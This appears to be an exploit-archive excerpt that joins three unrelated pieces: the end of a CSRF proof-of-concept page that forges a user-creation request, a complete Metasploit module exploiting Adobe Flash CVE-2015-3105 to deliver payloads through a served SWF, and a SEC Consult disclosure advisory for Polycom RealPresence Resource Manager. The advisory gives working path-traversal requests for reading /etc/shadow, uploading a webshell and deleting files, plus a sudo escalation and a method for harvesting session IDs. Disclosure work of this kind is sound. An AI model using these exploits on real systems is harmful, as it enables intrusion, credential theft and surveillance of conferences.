"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2WS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:600:450:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_State\"\r\n" +
"\r\n" +
"{\"file\":{},\"currentPath\":\"\"}\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_CS\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSelInput\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXKVInput\"\r\n" +
"\r\n" +
"[]\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$CallbackState\"\r\n" +
"\r\n" +
"BwEHAQIFU3RhdGUHQgcEBwACAQcBAgEHAgIBBwMCAQcABwAHAAcAAgAG//8JAgROYW1lBwAJAgACAAMHBAIABwACAQcABwACAQcABwAHAA==\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXFocusedRowInput\"\r\n" +
"\r\n" +
"-1\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSyncInput\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_IC\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBoxT_Input\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBox0_Input\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol3\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_VI\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDDWS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LDeletedItems\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LInsertedItems\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LCustomCallback\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8$DDD$L\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_VI\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDDWS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LDeletedItems\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LInsertedItems\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LCustomCallback\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13$DDD$L\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol12\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol11\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol10\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol9\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_custwindowWS\"\r\n" +
"\r\n" +
"0:0:-1:-10000:-10000:0:1:0:1:0:0:0\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXSelInput\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXKVInput\"\r\n" +
"\r\n" +
"[\'29bda11f-d51d-4c78-b7fc-0056d4b826ff\',\'c32608dc-946e-40ec-9be9-9f4e500539e6\',\'ca1a4bd3-9ba0-43a6-980e-60a8177be663\',\'8ccfc87f-e649-4a7b-bd16-a85ea172e54e\',\'e26a0c3b-eae0-4f76-8b88-185df3df8522\',\'0bc5697a-de09-4046-81b8-6f5fdda3f8e9\',\'cd21124b-9aec-472a-96e4-5ebefaa32fb1\',\'565dd57d-0420-4666-a443-7830349e2c66\',\'5aedba74-01b3-4d06-8159-19f3b30e6948\']\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$CallbackState\"\r\n" +
"\r\n" +
"BwQHAQIFU3RhdGUHdwcOBwACAQcAAgAHAAIABwECAQcBAgAHAQIABwECAAcBAgAHAgIBBwgCAQcHAgEHBgIBBwUCAQcEAgEHAAcABwAHAAIABQAAAIAJAgZVc2VySWQHAQIGVXNlcklkCwkCAAIAAwcEAgAHAAIBBzEHAAIBBwAHAAcAAg1TaG93RmlsdGVyUm93CgIBAhBGaWx0ZXJFeHByZXNzaW9uBwIAAglQYWdlSW5kZXgDBwQ=\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"DXScript\"\r\n" +
"\r\n" +
"1_171,1_94,1_164,1_114,1_121,1_105,1_91,1_156,1_154,1_116,1_93,1_169,1_138,1_170,1_124,1_163,1_162,1_147,1_104,1_166,1_139,1_120,1_98,1_125,1_157,1_108,1_113,1_106,1_152\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"DXCss\"\r\n" +
"\r\n" +
"0_2117,1_12,0_2121,1_5,0_2015,0_2013,0_2017,0_2019,../../Styles/css/alertify.css,../../Styles/css/themes/default.css,../../Styles/css/bootstrap-theme.css,../../Styles/css/bootstrap.css,../../Styles/css/LobbySiteMapStyle.css,../../Styles/IconFonts/flaticon.css,../../Styles/css/FormStyle.css,../../Styles/css/PopupStyle.css,../../Images/apple-icon-57x57.png,../../Images/apple-icon-60x60.png,../../Images/apple-icon-72x72.png,../../Images/apple-icon-76x76.png,../../Images/apple-icon-114x114.png,../../Images/apple-icon-120x120.png,../../Images/apple-icon-144x144.png,../../Images/apple-icon-152x152.png,../../Images/apple-icon-180x180.png,../../Images/android-icon-192x192.png,../../Images/favicon-32x32.png,../../Images/favicon-96x96.png,../../Images/favicon-16x16.png,../../Images/manifest.json\r\n" +
"-----------------------------284963701632007118234117095\r\n" +
"Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------284963701632007118234117095--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="PUSH THE BUTTON" onclick="submitRequest();" />
</form>
</body>
</html>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
'Description' => %q{
This module exploits a memory corruption happening when applying a Shader as a drawing fill
as exploited in the wild on June 2015. This module has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3105'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20150626-0 >
=======================================================================
title: Critical vulnerabilities allow surveillance on conferences
product: Polycom RealPresence Resource Manager (RPRM)
vulnerable versions: <8.4
fixed version: 8.4
CVE numbers: CVE-2015-4681, CVE-2015-4682, CVE-2015-4683, CVE-2015-4684
CVE-2015-4685
impact: critical
homepage: http://www.polycom.com
found: 2015-03-10
by: R. Freingruber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
"A key component of the Polycom RealPresence Platform, available as a hardened
appliance or software optimized for virtualized environments, the RealPresence
Resource Manager application is critical to effectively managing thousands of
mobile, desktop, and group telepresence systems."
http://www.polycom.com/content/www/en/products-services/realpresence-platform/management-applications/realpresence-resource-manager.html
Business recommendation:
- ------------------------
By combining all vulnerabilities documented in this advisory an unprivileged
authenticated remote attacker can gain full system access (root) on the RPRM
appliance. This has an impact on all conferences taking place via this RP
Resource Manager. Attackers can steal all conference passcodes and join or
record any conference.
SEC Consult recommends not to use this system until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
- -----------------------------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
The RPRM discloses the plaintext password of the RMX admin user to an
unauthorized unprivileged attacker by including it in certain HTTP responses.
No manipulation of parameters is required.
2) Arbitrary file disclosure (I) via path traversal (CVE-2015-4684)
Ordinary unprivileged users can download an Excel file of all their upcoming
conferences. This functionality can be exploited by an authenticated attacker
to download arbitrary files from the server due to insufficient input validation.
There is no restriction on which files might be downloaded since this action
is performed with root privileges.
3) Plaintext passwords stored in logfiles
RPRM generates logdata which includes plaintext passwords. This weakness in
combination with the previous vulnerability allows an unprivileged attacker
to escalate his privileges to the admin level in the web interface.
4) Arbitrary file upload via path traversal (CVE-2015-4684)
This vulnerability requires admin privileges in the web interface, but combining
all previous vulnerabilities in this advisory allows privilege escalation.
Administrators can import (upload) "user aliases" in the web interface. This
functionality is vulnerable to a path traversal attack. This vulnerability
can be exploited to upload a webshell and execute arbitrary commands with
the permissions of the system user "plcm".
5) Sudo misconfiguration allows privilege escalation (CVE-2015-4685)
The "plcm" user is allowed to execute certain tools and scripts in given
folders with root privileges. At the same time many of these scripts and
folders are writeable to the plcm user. This allows execution of arbitrary
code with root privileges.
6) Arbitrary file disclosure (II) and removal (path traversal) (CVE-2015-4684)
An authenticated attacker can download and remove any files using this path
traversal vulnerability. Exploitation of this vulnerability requires admin
privileges. There is no restriction on which files might be downloaded or
removed since this action is performed with root privileges.
7) Weak/Missing Authorization
The separation of users relies on the fact that conference IDs are not
guessable, but as soon as an information disclosure vulnerability allows an
attacker to gather conference IDs authorization can be bypassed. The
arbitrary file download vulnerability (2) allows an attacker to collect
valid conference IDs.
8) Absolute path disclosure (CVE-2015-4682)
The web application discloses the absolute path to the web root.
To collect this information no parameter manipulation is required.
The webroot path is valuable when uploading a web shell (see vulnerability 4).
9) Session ID in GET parameter allows for privilege escalation (CVE-2015-4683)
Certain actions on the website (Excel and log file downloads) submit
session IDs in HTTP GET parameters. If a privileged user performs such
an action his session ID is written to the webserver log which can be
retrieved by an unprivileged attacker by exploiting the vulnerability (2).
This results in an additional privilege escalation path. Since session IDs
are bound to source IP addresses successfull exploitation requires the
attacker to have the same source IP as his victim (e.g. NAT).
Proof of concept:
- -----------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
Request:
- -----
POST /PlcmRmWeb/JNetworkDeviceManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getAvailableBridges
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getAvailableBridges
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><resultsForConferenceOwner>false</resultsForConferenceOwner><areaId>-1</areaId></aa:getAvailableBridges></soap:Body></soap:Envelope>
- -----
Response:
- -----
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getAvailableBridgesResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<mcuList>
<belongsToAreaUgpId>0</belongsToAreaUgpId>
<defaultAliasName>*redacted*</defaultAliasName>
<description></description>
<deviceId>*redacted*</deviceId>
<deviceName>*redacted*</deviceName>
<deviceStatus>ONLINE</deviceStatus>
<deviceType>CR</deviceType>
<deviceUUID>00000000-0000-0000-0000-000000000000</deviceUUID>
<hasDeviceErrors>false</hasDeviceErrors>
<ipAddress>*redacted*</ipAddress>
<isCallServer>false</isCallServer>
<isMcuPoolOrderSource>false</isMcuPoolOrderSource>
<managedGatekeeperStatus>NOT_APPLICABLE</managedGatekeeperStatus>
<password>*PLAINTEXTPASSWORD*</password>
[...]
- -----
The same information is disclosed in the "aa:getMCUsNetworkDevicesForList" and
"aa:getNetworkDevicesForList" requests.
2) Arbitrary file disclosure (I) via path traversal
The following URL allows an attacker to read the /etc/shadow file:
https://hostname:8443/PlcmRmWeb/FileDownload?DownloadType=REPORT&Modifier=../../../../../../../etc/shadow&Credentials=*VALID-USER-TOKEN*&ClientId=&FileName=
root:<hash>:16135:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
dbus:!!:16135::::::
hacluster:!!:16135::::::
vcsa:!!:16135::::::
rpc:!!:16135:0:99999:7:::
ntp:!!:16135::::::
plcm:$1$nqk4wqYm$N4QLTb66K8JwE9yM2GuO.1:16135::::::
[...]
(plcm user password is Polycom123)
3) Plaintext passwords stored in logfiles
No proof of concept necessary.
4) Arbitrary file upload via path traversal
Request:
- -----
POST /PlcmRmWeb/FileUpload HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
User-Agent: Shockwave Flash
Host: <host>:8443
Content-Length: 1076
Connection: Keep-Alive
Cache-Control: no-cache
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filename"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_LOC"
null
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Token"
*VALID-USER-TOKEN*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_FNAME"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="UploadType"
SIP_URL_CSV
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="FlashSessionId"
*session-id*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filedata"; filename="webshell-123.jsp"
Content-Type: application/octet-stream
*web shell payload here*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Upload"
Submit Query
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0--
5) Sudo misconfiguration allows privilege escalation
Excerpt from /etc/sudoers:
plcm ALL=(ALL) ALL
plcm ALL=(root)NOPASSWD:/usr/sbin/dmidecode
plcm ALL=(root)NOPASSWD:/sbin/init
plcm ALL=(root)NOPASSWD:/sbin/service
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/bin/getNetworkInfo.pl
*...*
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/schema/script/getCipherSuiteMode.sh
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/ha/scripts/*
*...*
plcm ALL=(root)NOPASSWD:/var/polycom/cma/upgrade/scripts/*
plcm ALL=(root)NOPASSWD:/usr/bin/snmptrap
plcm ALL=(root)NOPASSWD:/usr/bin/snmpget
plcm ALL=(root)NOPASSWD:/sbin/iptables
*...*
plcm ALL=(root)NOPASSWD:/usr/sbin/tcpdump
plcm ALL=(root)NOPASSWD:/usr/sbin/logrotate
plcm ALL=(root)NOPASSWD:/usr/sbin/wired_supplicant_configurator
Among many other paths in this long list, the folder
/var/polycom/cma/upgrade/scripts/
is writeable for the plcm user. Simply placing any malicious script/executable in
this folder and executing it via sudo gives an attacker full root access.
6) Arbitrary file disclosure (II) and removal (path traversal)
The following request is used to disclose and remove "/etc/hosts" from the system.
An arbitrary file can be specified here (operations are executed with root privileges).
POST /PlcmRmWeb/JUserManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:importSipUriReservations
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:importSipUriReservations
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><filePathName>../../../../../../../../../../../../../etc/hosts</filePathName></aa:importSipUriReservations></soap:Body></soap:Envelope>
It's very likely that the SOAP action "aa:importUserH323Reservations" contains the same vulnerability.
7) Weak/Missing Authorization
The exploit of this vulnerability has been removed from this advisory.
According to the vendor it is unresolved in the new software version 8.4.
8) Absolute path disclosure
Request:
- -----
POST /PlcmRmWeb/JConfigManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getCustomLogoUploadPath
Content-Length: 417
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getCustomLogoUploadPath
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials></aa:getCustomLogoUploadPath></soap:Body></soap:Envelope>
- -----
Response:
- ---------
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getCustomLogoUploadPathResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<url>/download/CustomLogos/</url>
<path>/opt/polycom/cma/current/jserver/web/ROOT.war/download/CustomLogos/</path>
</ns2:getCustomLogoUploadPathResponse>
</env:Body>
</env:Envelope>
- -----
At least the following SOAP actions can be used to retrieve absolute paths:
- - aa:getCustomLogoUploadPath
- - aa:getCustomDesktopLogoUploadPath
- - aa:getUploadDirectory
- - aa:getSystemLogFiles
- - aa:getLegacyUploadDir
- - aa:getAuditLogFiles
9) Session ID in GET parameter allows privilege escalation
Sample URL that contains a session ID in the GET parameter 'Credential':
/PlcmRmWeb/FileDownload?DownloadType=LOGGER&Modifier=-123&Credentials=12345678-1234-1234-1234-123456789000&ClientId=&FileName=Conference.log
Path to the webserver access logfiles:
/var/log/polycom/cma/audit/localhost_access_log.log
/var/log/polycom/cma/audit/localhost_access_log.log.1.gz
...
Extract valid session IDs from the log files:
egrep "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" localhost_access_log.log
Vulnerable versions:
- -----------------------------
According to the vendor, all software versions <8.4 are affected.
Vendor contact timeline:
- ------------------------
2015-03-25: Video conference with Polycom, discussing vulnerabilities
2015-03-27: Contacting Polycom through security@polycom.com, requesting
encryption keys, attaching responsible disclosure policy.
2015-04-01: Polycom provides PGP key
2015-04-02: Sending encrypted security advisory to Polycom
2015-04-03: Polycom provides affected versions
2015-04-29: Polycom provides planned release date (2015-06-19) and
version number that fixes issues.
2015-05-06: SEC Consult confirms advisory release date: 2015-06-26
2015-06-15: Polycom releases RPRM v8.4
2015-06-18: Polycom provides URL to RPRM v8.4
2015-06-18: SEC Consult asks for reassurance that v8.4 fixes reported
vulnerabilities since 8.4's release notes do not mention
any fixes.
2015-06-22: Received a list that the vulnerabilities were fixed.
2015-06-26: Coordinated release of security advisory.
Solution:
- ---------
Update to RPRM v8.4.
For further information see the following URL of the vendor:
http://support.polycom.com/PolycomService/support/us/support/network/management_scheduling/realpresence_resource_manager.html
Exception:
RPRM v8.4 does _not_ address the weakness described in section 7
(Weak/Missing Authorization).
Workaround:
- -----------
None.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
